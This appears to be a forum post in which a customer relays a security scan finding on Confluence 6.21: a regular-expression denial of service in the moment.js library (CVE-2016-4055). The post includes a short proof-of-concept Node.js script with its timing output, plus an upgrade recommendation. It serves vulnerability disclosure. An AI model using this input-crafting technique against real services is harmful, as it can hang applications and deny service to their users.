Hi,
Our security team performed a security scan on Confluence 6.21 and found a security issue and the detials are provided below. We could only adopt for production use, if that risk is addressed by Atlassian. Our procurement department is waiting for us to obtain a mitigating solution for this issue, before they procure Confluence.
Severity Sonatype CVSS 3.0: 7.5
Weakness Sonatype CWE: 400
Explanation The moment package is vulnerable to a Regular Expression Denial of Service (ReDoS). The moment.duration() method in moment.js contains a regular expression, used to determine if an input is of the ASP.NET date format, that can cause an application to hang. The aspNetRegex, the variable's name in the code, causes very slow processing of exponentially long repetitive sequences leading to a Denial of Service (DoS) due to excessive resource consumption. A remote attacker could exploit this flaw by supplying a specially crafted request URL containing long repetitive sequences to cause the denial of service (DoS). "
Proof of concept:
var moment = require('moment');
var genstr = function (len, chr) { var result = "";
for (i=0; i<=len; i++) { result = result + chr; } return result; } for (i=20000;i<=10000000;i=i+10000) { console.log("COUNT: " + i);
var str = '-' + genstr(i, '1') console.log("LENGTH: " + str.length); var start = process.hrtime(); moment.duration(str) var end = process.hrtime(start); console.log(end); }
Results $ node moment.js COUNT: 20000 LENGTH: 20002 [ 0, 618931029 ] COUNT: 30001 LENGTH: 30003 [ 1, 401413894 ] COUNT: 40002 LENGTH: 40004 [ 2, 437075303 ] COUNT: 50003 LENGTH: 50005 [ 3, 824664804 ] COUNT: 60004 LENGTH: 60006 [ 5, 651335262 ] "
Reference Link: https://nodesecurity.io/advisories/55 Note: CVE-2016-4055 has been assigned to this vulnerability. Detection The application is vulnerable by using this package. Recommendation We recommend upgrading to a version of this component that is not vulnerable to this specific issue. Categories Data
Root Cause moment : 2.5.0
Advisories Project: https://nodesecurity.io/advisories/55
Our security team has asked me to direct you to How to Report a Security Issue.
It would be great if you could follow up on this forum to let the Community know the result.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.